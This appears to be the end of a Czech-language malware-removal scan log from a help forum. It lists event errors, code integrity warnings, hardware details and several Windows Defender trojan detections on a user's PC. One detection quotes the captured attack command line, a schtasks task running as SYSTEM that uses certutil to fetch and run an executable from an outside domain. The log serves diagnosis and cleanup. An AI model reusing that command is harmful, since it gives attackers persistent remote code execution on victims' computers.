Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 32768 (0x0000000000008000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 16384 (0x0000000000004000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 8192 (0x0000000000002000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
System errors:
=============
Error: (09/12/2020 11:41:24 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 11:41:24 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 10:41:31 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 10:16:32 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 10:12:07 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 10:10:19 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Error: (09/11/2020 09:46:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba NVIDIA Display Container LS byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 6000 milisekund: Restartovat službu.
Error: (09/11/2020 09:45:18 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.
Windows Defender:
===================================
Date: 2020-08-29 22:36:38.516
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Wacatac.C!ml
ID: 2147749372
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Program Files\M3PY0PHHSX\M3PY0PHHS.exe; file:_C:\Users\Milan\AppData\Local\Temp\acmiqlndjnf\zod1s2pvolq.exe; regkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y; runkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Windows\explorer.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:36:38.513
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Hynamer.C!ml
ID: 2147749152
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:36:38.510
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Wacatac.DB!ml
ID: 2147757790
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\lttfjp4yc3u\vujrxhyhkrm.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:36:38.508
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Cryptinject!MTB
ID: 2147729037
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\dzekzdxxrlm\ifhvvyy.exe; file:_C:\Users\Milan\AppData\Local\Temp\r04v3ss32nl\ifhvvyy.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Program Files (x86)\oizjd\53280214.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
Date: 2020-08-29 22:35:50.832
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://bbistrovantonbb.com/app/app.exe C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5
CodeIntegrity:
===================================
Date: 2020-09-12 11:45:27.046
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 11:45:26.975
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 11:45:26.852
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 11:45:26.713
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 10:45:41.032
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 10:45:26.797
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 10:45:26.788
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
Date: 2020-09-12 10:45:26.504
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.
==================== Memory info ===========================
BIOS: Award Software International, Inc. F3 07/28/2010
Motherboard: Gigabyte Technology Co., Ltd. GA-770T-D3L
Processor: AMD Athlon(tm) II X2 250 Processor
Percentage of memory in use: 32%
Total physical RAM: 12285.55 MB
Available physical RAM: 8233.7 MB
Total Virtual: 14141.55 MB
Available Virtual: 8472.37 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:476.31 GB) (Free:278 GB) NTFS
Drive e: (HDD-1000) (Fixed) (Total:931.51 GB) (Free:737.23 GB) NTFS
Drive f: (ZelenyHDD) (Fixed) (Total:465.76 GB) (Free:28.95 GB) NTFS
Drive g: (Car Mechanic Simulator 2018 Merc) (CDROM) (Total:7.51 GB) (Free:0 GB) UDF
\\?\Volume{5d2f0ce6-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5d2f0ce6-0000-0000-0000-101a77000000}\ () (Fixed) (Total:0.53 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 476.9 GB) (Disk ID: 5D2F0CE6)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=476.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=543 MB) - (Type=27)
==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 8C19AC0D)
Partition: GPT.
==========================================================
Disk: 2 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BFAA9354)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================
Za příspěvek děkujeme.